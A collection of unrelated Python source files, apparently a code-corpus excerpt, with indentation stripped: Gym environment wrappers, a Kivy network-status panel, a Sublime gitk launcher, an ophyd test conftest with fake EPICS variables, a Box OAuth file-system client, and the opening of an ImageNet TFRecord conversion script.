if self._step >= self._duration:
done = True
self._step = None
return observ, reward, done, info
def reset(self):
self._step = 0
return self._env.reset()
class ExternalProcess(object):
"""Step environment in a separate process for lock free paralellism."""
# Message types for communication via the pipe.
_ACCESS = 1
_CALL = 2
_RESULT = 3
_EXCEPTION = 4
_CLOSE = 5
def __init__(self, constructor):
"""Step environment in a separate process for lock free parallelism.
The environment will be created in the external process by calling the
specified callable. This can be an environment class, or a function
creating the environment and potentially wrapping it. The returned
environment should not access global variables.
Args:
constructor: Callable that creates and returns an OpenAI gym environment.
Attributes:
observation_space: The cached observation space of the environment.
action_space: The cached action space of the environment.
"""
self._conn, conn = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=self._worker, args=(constructor, conn))
atexit.register(self.close)
self._process.start()
self._observ_space = None
self._action_space = None
@property
def observation_space(self):
if not self._observ_space:
self._observ_space = self.__getattr__('observation_space')
return self._observ_space
@property
def action_space(self):
if not self._action_space:
self._action_space = self.__getattr__('action_space')
return self._action_space
def __getattr__(self, name):
"""Request an attribute from the environment.
Note that this involves communication with the external process, so it can
be slow.
Args:
name: Attribute to access.
Returns:
Value of the attribute.
"""
self._conn.send((self._ACCESS, name))
return self._receive()
def call(self, name, *args, **kwargs):
"""Asynchronously call a method of the external environment.
Args:
name: Name of the method to call.
*args: Positional arguments to forward to the method.
**kwargs: Keyword arguments to forward to the method.
Returns:
Promise object that blocks and provides the return value when called.
"""
payload = name, args, kwargs
self._conn.send((self._CALL, payload))
return self._receive
def close(self):
"""Send a close message to the external process and join it."""
try:
self._conn.send((self._CLOSE, None))
self._conn.close()
except IOError:
# The connection was already closed.
pass
self._process.join()
def step(self, action, blocking=True):
"""Step the environment.
Args:
action: The action to apply to the environment.
blocking: Whether to wait for the result.
Returns:
Transition tuple when blocking, otherwise callable that returns the
transition tuple.
"""
promise = self.call('step', action)
if blocking:
return promise()
else:
return promise
def reset(self, blocking=True):
"""Reset the environment.
Args:
blocking: Whether to wait for the result.
Returns:
New observation when blocking, otherwise callable that returns the new
observation.
"""
promise = self.call('reset')
if blocking:
return promise()
else:
return promise
def _receive(self):
"""Wait for a message from the worker process and return its payload.
Raises:
Exception: An exception was raised inside the worker process.
KeyError: The received message is of an unknown type.
Returns:
Payload object of the message.
"""
message, payload = self._conn.recv()
# Re-raise exceptions in the main process.
if message == self._EXCEPTION:
stacktrace = payload
raise Exception(stacktrace)
if message == self._RESULT:
return payload
raise KeyError('Received message of unexpected type {}'.format(message))
def _worker(self, constructor, conn):
"""The process waits for actions and sends back environment results.
Args:
constructor: Constructor for the OpenAI Gym environment.
conn: Connection for communication to the main process.
Raises:
KeyError: When receiving a message of unknown type.
"""
try:
env = constructor()
while True:
try:
# Only block for short times to have keyboard exceptions be raised.
if not conn.poll(0.1):
continue
message, payload = conn.recv()
except (EOFError, KeyboardInterrupt):
break
if message == self._ACCESS:
name = payload
result = getattr(env, name)
conn.send((self._RESULT, result))
continue
if message == self._CALL:
name, args, kwargs = payload
result = getattr(env, name)(*args, **kwargs)
conn.send((self._RESULT, result))
continue
if message == self._CLOSE:
assert payload is None
break
raise KeyError('Received message of unknown type {}'.format(message))
except Exception: # pylint: disable=broad-except
stacktrace = ''.join(traceback.format_exception(*sys.exc_info()))
tf.logging.error('Error in environment process: {}'.format(stacktrace))
conn.send((self._EXCEPTION, stacktrace))
conn.close()
class ConvertTo32Bit(object):
"""Convert data types of an OpenAI Gym environment to 32 bit."""
def __init__(self, env):
"""Convert data types of an OpenAI Gym environment to 32 bit.
Args:
env: OpenAI Gym environment.
"""
self._env = env
def __getattr__(self, name):
"""Forward unimplemented attributes to the original environment.
Args:
name: Attribute that was accessed.
Returns:
Value behind the attribute name in the wrapped environment.
"""
return getattr(self._env, name)
def step(self, action):
"""Forward action to the wrapped environment.
Args:
action: Action to apply to the environment.
Raises:
ValueError: Invalid action.
Returns:
Converted observation, converted reward, done flag, and info object.
"""
observ, reward, done, info = self._env.step(action)
observ = self._convert_observ(observ)
reward = self._convert_reward(reward)
return observ, reward, done, info
def reset(self):
"""Reset the environment and convert the resulting observation.
Returns:
Converted observation.
"""
observ = self._env.reset()
observ = self._convert_observ(observ)
return observ
def _convert_observ(self, observ):
"""Convert the observation to 32 bits.
Args:
observ: Numpy observation.
Raises:
ValueError: Observation contains infinite values.
Returns:
Numpy observation with 32-bit data type.
"""
if not np.isfinite(observ).all():
raise ValueError('Infinite observation encountered.')
if observ.dtype == np.float64:
return observ.astype(np.float32)
if observ.dtype == np.int64:
return observ.astype(np.int32)
return observ
def _convert_reward(self, reward):
"""Convert the reward to 32 bits.
Args:
reward: Numpy reward.
Raises:
ValueError: Rewards contain infinite values.
Returns:
Numpy reward with 32-bit data type.
"""
if not np.isfinite(reward).all():
raise ValueError('Infinite reward encountered.')
return np.array(reward, dtype=np.float32)
class CacheSpaces(object):
"""Cache observation and action space to not recompute them repeatedly."""
def __init__(self, env):
"""Cache observation and action space to not recompute them repeatedly.
Args:
env: OpenAI Gym environment.
"""
self._env = env
self._observation_space = self._env.observation_space
self._action_space = self._env.action_space
def __getattr__(self, name):
"""Forward unimplemented attributes to the original environment.
Args:
name: Attribute that was accessed.
Returns:
Value behind the attribute name in the wrapped environment.
"""
return getattr(self._env, name)
@property
def observation_space(self):
return self._observation_space
@property
def action_space(self):
return self._action_space
|
connection_panel.py
|
#
# Copyright (C) 2020 Adam Meily
#
# This file is subject to the terms and conditions defined in the file 'LICENSE', which is part of
# this source code package.
#
import threading
import logging
import socket
from typing import List
from kivy.uix.boxlayout import BoxLayout
from kivy.clock import Clock
from kivy.event import EventDispatcher
from kivy.logger import Logger
from dns.resolver import Resolver
from .bool_sensor import BoolSensor
from .ping import ping
from .config import config
class ConnectionPanel(BoxLayout, EventDispatcher):
def __init__(self, **kwargs):
BoxLayout.__init__(self, orientation='horizontal', **kwargs)
EventDispatcher.__init__(self)
# ping local gateway - bolt
# ping external gateway - external-link
# dns query, icanhazip - person
# icanhazip - get external IP - cloud
self.local_gateway_sensor = BoolSensor(text='Local Gateway', image='bolt.png')
self.external_gateway_sensor = BoolSensor(text='External Gateway',
image='external-link.png')
self.external_dns_sensor = BoolSensor(text='External DNS', image='person.png')
self.local_dns_sensor = BoolSensor(text='Local DNS', image='people.png')
self.add_widget(self.local_gateway_sensor)
self.add_widget(self.external_gateway_sensor)
self.add_widget(self.external_dns_sensor)
self.add_widget(self.local_dns_sensor)
self.register_event_type('on_sensor_done')
self.state = 'unknown'
def run_sensors(self, reset: bool = False):
if reset:
self.local_gateway_sensor.state = 'unknown'
self.external_gateway_sensor.state = 'unknown'
self.external_dns_sensor.state = 'unknown'
self.local_dns_sensor.state = 'unknown'
thread = threading.Thread(target=self._run_sensors)
thread.start()
def _run_sensors(self):
Logger.info('Connection: running connection sensors')
if not ping(config.local_gateway):
Logger.error('Connection: local gateway ping failed')
self.mark_bad(self.local_gateway_sensor, self.external_gateway_sensor,
self.external_dns_sensor, self.local_dns_sensor)
return
Logger.info('Connection: local gateway ping successful')
self.local_gateway_sensor.state = 'good'
if not ping(config.external_gateway):
Logger.info('Connection: external gateway ping failed')
self.mark_bad(self.external_gateway_sensor, self.external_dns_sensor,
self.local_dns_sensor)
return
Logger.info('Connection: external gateway ping successful')
self.external_gateway_sensor.state = 'good'
resolver = Resolver(configure=False)
resolver.nameservers = list(config.external_dns)
try:
ans = resolver.resolve('google.com.')
icanhazip = str(ans[0])
except:
Logger.exception('Connection: external dns query failed')
self.mark_bad(self.external_dns_sensor, self.local_dns_sensor)
return
Logger.info('Connection: external dns query successful')
self.external_dns_sensor.state = 'good'
resolver = Resolver(configure=False)
resolver.nameservers = list(config.local_dns)
try:
ans = resolver.resolve('google.com.')
icanhazip = str(ans[0])
except:
Logger.exception('Connection: internal dns query failed')
self.mark_bad(self.local_dns_sensor)
return
Logger.info('Connection: internal dns query successful')
self.local_dns_sensor.state = 'good'
self.state = 'good'
self.dispatch('on_sensor_done')
def mark_bad(self, *sensors: List[BoolSensor]) -> None:
for sensor in sensors:
sensor.state = 'bad'
self.state = 'failed'
self.dispatch('on_sensor_done')
def on_sensor_done(self):
pass
|
gitk.py
|
# coding: utf-8
import os
import subprocess
import threading
import sublime
from sublime_plugin import WindowCommand
from .util import get_executable
from .cmd import GitCmd
EXECUTABLE_ERROR = ("Executable '{bin}' was not found in PATH. Current PATH:\n\n"
"{path}")
class GitGitkCommand(WindowCommand, GitCmd):
"""
Documentation coming soon.
"""
def run(self):
cwd = self.get_repo(silent=False)
if not cwd:
return
cmd = get_executable('gitk', ['gitk'])
startupinfo = self.startupinfo()
environment = self.env()
def async_inner():
try:
os.chdir(cwd)
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
startupinfo=startupinfo,
env=environment)
proc.wait()
except OSError:
path = "\n".join(os.environ.get('PATH', '').split(':'))
msg = EXECUTABLE_ERROR.format(bin='gitk', path=path)
sublime.error_message(msg)
thread = threading.Thread(target=async_inner)
thread.start()
|
conftest.py
|
import sys
import time
import random
import logging
import pytest
import threading
from functools import wraps
import weakref
import numpy as np
import numpy.testing
from ophyd import get_cl, set_cl
logger = logging.getLogger(__name__)
_FAKE_PV_LIST = []
class FakeEpicsPV(object):
_connect_delay = (0.05, 0.1)
_update_rate = 0.1
fake_values = (0.1, 0.2, 0.3)
_pv_idx = 0
auto_monitor = True
def __init__(self, pvname, form=None,
callback=None, connection_callback=None,
auto_monitor=True, enum_strs=None,
**kwargs):
self.callbacks = dict()
global _FAKE_PV_LIST
_FAKE_PV_LIST.append(self)
self._pvname = pvname
self._connection_callback = connection_callback
self._form = form
self._auto_monitor = auto_monitor
self._value = self.fake_values[0]
self._connected = False
self._running = True
self.enum_strs = enum_strs
FakeEpicsPV._pv_idx += 1
self._idx = FakeEpicsPV._pv_idx
self._update = True
self._lock = threading.Lock()
self._thread = threading.Thread(target=self._update_loop)
self._thread.daemon = True
self._thread.start()
if callback:
self.add_callback(callback)
def __del__(self):
self.clear_callbacks()
self._running = False
try:
self._thread.join()
self._thread = None
except Exception:
pass
def get_timevars(self):
pass
def get_ctrlvars(self):
pass
@property
def connected(self):
return self._connected
def wait_for_connection(self, timeout=None):
if self._pvname in ('does_not_connect', ):
return False
while not self._connected:
time.sleep(0.05)
return True
def _update_loop(self):
time.sleep(random.uniform(*self._connect_delay))
if self._connection_callback is not None:
self._connection_callback(pvname=self._pvname, conn=True, pv=self)
if self._pvname in ('does_not_connect', ):
return
last_value = None
while self._running:
with self._lock:
if self._update:
self._value = random.choice(self.fake_values)
if self._value != last_value:
sys.stdout.flush()
self.run_callbacks()
last_value = self._value
time.sleep(self._update_rate)
self._connected = True
time.sleep(0.01)
@property
def lower_ctrl_limit(self):
return min(self.fake_values)
@property
def upper_ctrl_limit(self):
return max(self.fake_values)
def run_callbacks(self):
for index in sorted(list(self.callbacks.keys())):
if not self._running:
break
self.run_callback(index)
def run_callback(self, index):
fcn = self.callbacks[index]()
if fcn is None:
self.remove_callback(index)
return
kwd = dict(pvname=self._pvname,
count=1,
nelm=1,
type=None,
typefull=None,
ftype=None,
access='rw',
chid=self._idx,
read_access=True,
write_access=True,
value=self.value,
)
kwd['cb_info'] = (index, self)
if hasattr(fcn, '__call__'):
fcn(**kwd)
def add_callback(self, callback=None, index=None, run_now=False,
with_ctrlvars=True):
if hasattr(callback, '__call__'):
if index is None:
index = 1
if len(self.callbacks) > 0:
index = 1 + max(self.callbacks.keys())
try:
self.callbacks[index] = weakref.WeakMethod(callback)
except TypeError:
self.callbacks[index] = weakref.ref(callback)
if run_now:
if self.connected:
self.run_callback(index)
return index
def remove_callback(self, index=None):
self.callbacks.pop(index, None)
def clear_callbacks(self):
self.callbacks.clear()
@property
def precision(self):
return 0
@property
def units(self):
return str(None)
@property
def timestamp(self):
return time.time()
@property
def pvname(self):
return self._pvname
@property
def value(self):
return self._value
def __repr__(self):
return '<FakePV %s value=%s>' % (self._pvname, self.value)
def get(self, as_string=False, use_numpy=False,
use_monitor=False):
if as_string:
if isinstance(self.value, list):
if self.enum_strs:
return [self.enum_strs[_] for _ in self.value]
return list(self.value)
if isinstance(self.value, str):
return self.value
else:
if self.enum_strs:
return self.enum_strs[self.value]
return str(self.value)
elif use_numpy:
return np.array(self.value)
else:
return self.value
def put(self, value, wait=False, timeout=30.0,
use_complete=False, callback=None, callback_data=None):
with self._lock:
self._update = False
self._value = value
class FakeEpicsWaveform(FakeEpicsPV):
strings = ['abcd', 'efgh', 'ijkl']
fake_values = [[ord(c) for c in s] + [0]
for s in strings]
auto_monitor = False
form = 'time'
def _cleanup_fake_pvs():
pvs = list(_FAKE_PV_LIST)
del _FAKE_PV_LIST[:]
for pv in pvs:
pv.clear_callbacks()
pv._running = False
pv._connection_callback = None
for pv in pvs:
try:
pv._thread.join()
pv._thread = None
except Exception:
pass
def using_fake_epics_pv(fcn):
@wraps(fcn)
def wrapped(*args, **kwargs):
cl = get_cl()
get_pv_backup = cl.get_pv
def _fake_get_pv(pvname, form='time', connect=False,
context=False, timout=5.0, **kw):
return FakeEpicsPV(pvname, form=form, **kw)
cl.get_pv = _fake_get_pv
try:
return fcn(*args, **kwargs)
finally:
cl.get_pv = get_pv_backup
_cleanup_fake_pvs()
return wrapped
def using_fake_epics_waveform(fcn):
@wraps(fcn)
def wrapped(*args, **kwargs):
cl = get_cl()
get_pv_backup = cl.get_pv
def _fake_get_pv(pvname, form='time', connect=False,
context=False, timout=5.0, **kw):
return FakeEpicsWaveform(pvname, form=form, **kw)
cl.get_pv = _fake_get_pv
try:
return fcn(*args, **kwargs)
finally:
cl.get_pv = get_pv_backup
_cleanup_fake_pvs()
return wrapped
@pytest.fixture()
def hw():
from ophyd.sim import hw
return hw()
@pytest.fixture(params=['caproto', 'pyepics'], autouse=True)
def cl_selector(request):
cl_name = request.param
if cl_name == 'caproto':
pytest.importorskip('caproto')
elif cl_name == 'pyepics':
pytest.importorskip('epics')
set_cl(cl_name)
yield
set_cl()
class AssertTools:
@staticmethod
def assertEquals(a, b):
assert a == b
@staticmethod
def assertEqual(a, b):
assert a == b
@staticmethod
def assertNotEqual(a, b):
assert a != b
@staticmethod
def assertRaises(Etype, func, *args, **kwargs):
with pytest.raises(Etype):
func(*args, **kwargs)
@staticmethod
def assertIn(val, target):
assert val in target
@staticmethod
def assertIs(a, b):
assert a is b
@staticmethod
def assertTrue(v):
assert v
@staticmethod
def assertFalse(v):
assert not v
@staticmethod
def assertGreater(a, b):
assert a > b
@staticmethod
def assertAlmostEqual(a, b):
numpy.testing.assert_almost_equal(a, b)
@staticmethod
def skipTest(msg):
pytest.skip(msg)
|
box_client.py
|
from __future__ import print_function
from contextlib import contextmanager
from flask import Flask, request
from multiprocessing import Process, Queue
import os
import time
import subprocess
import json
from boxsdk import OAuth2
from boxsdk import Client
import logging
from StringIO import StringIO
# Remove logging from flask app
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
try:
basestring
except NameError:
basestring = str
@contextmanager
def with_flask_server(app):
'''
A context manager for a flask server that is run as a separate process.
The context manager returns a multiprocessing queue, which is the way we
pass the request arguments back from the HTTP handler to our oauth code.
'''
def child_main(q):
app.mp_queue = q
app.run(port=8080)
try:
q = Queue()
server = Process(target=child_main, args=(q,))
server.start()
yield q
finally:
server.terminate()
server.join()
def _config_get():
config_path = os.path.expanduser('~/.stopwatch-sync/config.json')
if not os.path.exists(os.path.dirname(config_path)):
os.makedirs(os.path.dirname(config_path))
if os.path.exists(config_path):
# HACK handle errors in JSON format?
with open(config_path, 'rb') as f:
return json.load(f)
else:
return {}
def _config_set(key, value):
config = _config_get()
config[key] = value
config_path = os.path.expanduser('~/.stopwatch-sync/config.json')
with open(config_path, 'wb') as f:
json.dump(config, f)
def _store_tokens(access_token, refresh_token):
_config_set('box_access_token', access_token)
_config_set('box_refresh_token', refresh_token)
def box_client():
config = _config_get()
if config.get('box_refresh_token') and config.get('box_access_token'):
oauth = OAuth2(
client_id=config.get('box_client_ID'),
client_secret=config.get('box_client_secret'),
store_tokens=_store_tokens,
access_token=config.get('box_access_token'),
refresh_token=config.get('box_refresh_token'),
)
else:
oauth = _oauth_flow()
return Client(oauth)
def _oauth_flow():
app = Flask(__name__)
@app.route('/stopwatch-box')
def hello_world():
app.mp_queue.put(dict(
state=request.args['state'],
code=request.args['code'],
))
return (
'You have successfully authenticated with Box for StopWatch Sync. '
'You can close this window and return to the terminal.')
oauth = OAuth2(
client_id=key['clientID'],
client_secret=key['clientSecret'],
store_tokens=_store_tokens,
)
with with_flask_server(app) as q:
auth_url, csrf_token = oauth.get_authorization_url('http://localhost:8080/stopwatch-box')
subprocess.check_call(['open', auth_url])
print('''
Your browser has been opened to visit:
{}
'''.format(auth_url))
request_args = q.get()
# Sleep for a bit to make sure the page renders before the server is killed
time.sleep(0.1)
assert request_args['state'] == csrf_token, 'CSRF token did not match. Expected {} but found {}'.format(
csrf_token, request_args['state'])
oauth.authenticate(request_args['code'])
return oauth
class BoxFileNotFound(Exception):
'''
Error thrown when a file or directory is not found in Box.
'''
pass
class BoxFS(object):
'''
A collection of methods to simplify using the Box API as a file system.
Since each file system access needs to hit the Box API, all methods have
a from_dir option that permits running the command assuming that command
paths should be interpreted relative to the supplied Box Folder object.
This can be used to improve the performance of code and is particularly
beneficial when accessing deep paths in Box.
'''
def __init__(self, client):
self.client = client
def _iter_get_all_items(self, container, limit=100):
'''
Iterator over all the items in this container. Uses pagination API to ensure all files are retrieved.
'''
offset = 0
while True:
items = container.get_items(limit=limit, offset=offset)
# We terminate the loop if this page has no items
if not items:
break
for item in items:
yield item
offset += limit
def _find_item(self, container, name, create_folder_if_missing=False):
'''
Looks for an item in a directory with a matching name. Can optionally create folder if the item is missing.
'''
for item in self._iter_get_all_items(container):
if item['name'] == name:
return item
if create_folder_if_missing:
return container.create_subfolder(name)
else:
raise BoxFileNotFound('Could not find folder {} in {}'.format(name, container))
def _find_path(self, path, from_dir=None, create_folder_if_missing=False):
if not from_dir:
# If no directory to start from is supplied, we start from the root directory.
from_dir = self.client.folder(folder_id='0').get()
item = from_dir
for segment in path.split(os.path.sep):
# HACK we skip empty segments, either because of leading/trailing slash or double slash.
if not segment:
continue
item = self._find_item(item, segment, create_folder_if_missing=create_folder_if_missing)
return item
def find_if_exists(self, path, from_dir=None):
'''
Returns the file or folder at the path. If it does not exist, this returns None.
'''
try:
return self._find_path(path, from_dir=from_dir)
except BoxFileNotFound:
return None
def makedirs(self, path, from_dir=None):
'''
Recursive directory creation function. Does not throw error if leaf folder already exists.
'''
return self._find_path(path, create_folder_if_missing=True, from_dir=from_dir)
def exists(self, path, from_dir=None):
'''
Returns whether the file or directory at this path exists.
'''
try:
self._find_path(path, from_dir=from_dir)
return True
except BoxFileNotFound:
return False
def read(self, path_or_file, from_dir=None):
'''
Return the file contents at a given path or for a supplied box file object.
'''
if isinstance(path_or_file, basestring):
f = self._find_path(path_or_file, from_dir=from_dir)
else:
f = path_or_file
s = StringIO()
f.download_to(s)
return s.getvalue()
def write(self, path, data, from_dir=None, force_create=False):
'''
Write a file's content to a path. Requires the directory to exist.
Returns the file object that was written to.
When force_create is set, this method will always create a new file without checking to see
if one exists. This option exists primarily to be more performant.
'''
folder = self._find_path(os.path.dirname(path), from_dir=from_dir)
basename = os.path.basename(path)
s = StringIO(data)
# In some cases, we prefer to force file creation, as we may be certain the file does not exist.
if force_create:
return folder.upload_stream(s, basename)
try:
# If the file exists, we simply update the contents.
existing = self._find_item(folder, basename)
existing.update_contents_with_stream(s)
return existing
except BoxFileNotFound:
# If the file does not exist, we create the file.
return folder.upload_stream(s, basename)
if __name__ == '__main__':
config = _config_get()
print('current config', config)
client = box_client()
me = client.user(user_id='me').get()
print('user_login: ' + me['login'])
|
build_imagenet_data.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFREcord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take around ~2.5 hours on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1024,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.app.flags.DEFINE_string('labels_file',
'imagenet_lsvrc_2015_synsets.txt',
'Labels file')
# This file containing mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.app.flags.DEFINE_string('imagenet_metadata_file',
'imagenet_metadata.txt',
'ImageNet metadata file')
# This file is the output of process_bounding_box.py
# Assumes each line of the file looks like:
#
# n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
# <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist mulitple bounding box annotations associated
# with an image file.
tf.app.flags.DEFINE_string('bounding_box_file',
'./imagenet_2012_bounding_boxes.csv',
'Bounding box file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, synset, human, bbox,
height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
bbox: list of bounding boxes; each box is a list of integers
specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
the same label as the image label.
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
xmin = []
ymin = []
xmax = []
ymax = []
for b in bbox:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([xmin, ymin, xmax, ymax], b)]
# pylint: enable=expression-not-assigned
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/synset': _bytes_feature(synset),
'image/class/text': _bytes_feature(human),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature([label] * len(xmin)),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename)),
'image/encoded': _bytes_feature(image_buffer)}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
image_data = tf.gfile.FastGFile(filename, 'r').read()
# Clean the dirty data.
if _is_png(filename):
# 1 image is a PNG.
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
elif _is_cmyk(filename):
# 22 JPEG images are in CMYK colorspace.
print('Converting CMYK to RGB for %s' % filename)
image_data = coder.cmyk_to_rgb(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
